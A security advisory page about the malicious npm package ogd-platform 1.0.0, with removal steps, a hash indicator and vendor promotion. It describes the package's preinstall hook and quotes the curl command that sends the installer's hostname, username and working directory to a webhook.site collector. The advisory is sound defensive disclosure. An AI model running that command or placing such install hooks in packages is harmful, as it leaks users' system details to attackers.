Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

ogd-platformnpm

Malicious code in ogd-platform (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5828
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall ogd-platform

What this malware does

The package contains only a package.json with a preinstall lifecycle script and ships no actual functionality despite advertising itself as an 'Open Government Data Platform core'. On npm install, the preinstall hook runs curl --data-urlencode "info=$(hostname && whoami && pwd)" against a webhook.site collector URL, sending the installer's hostname, username, and current working directory to an attacker-controlled endpoint. The empty tarball plus recon beacon is the canonical dependency-confusion / namespace-squat reconnaissance shape: an internal build expecting a private ogd-platform package would resolve to this public registry entry and leak host identifiers to the attacker on install.

Malicious versions

1 flagged
1.0.0

Indicators of compromise (SHA-256)

f17f2c263db2adee12698bd9046668b9b674bcdf063b959f54841914a6028931

Frequently asked questions

No. ogd-platform on npm has been identified as a malicious package (version 1.0.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006699

References

Credits

  • Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection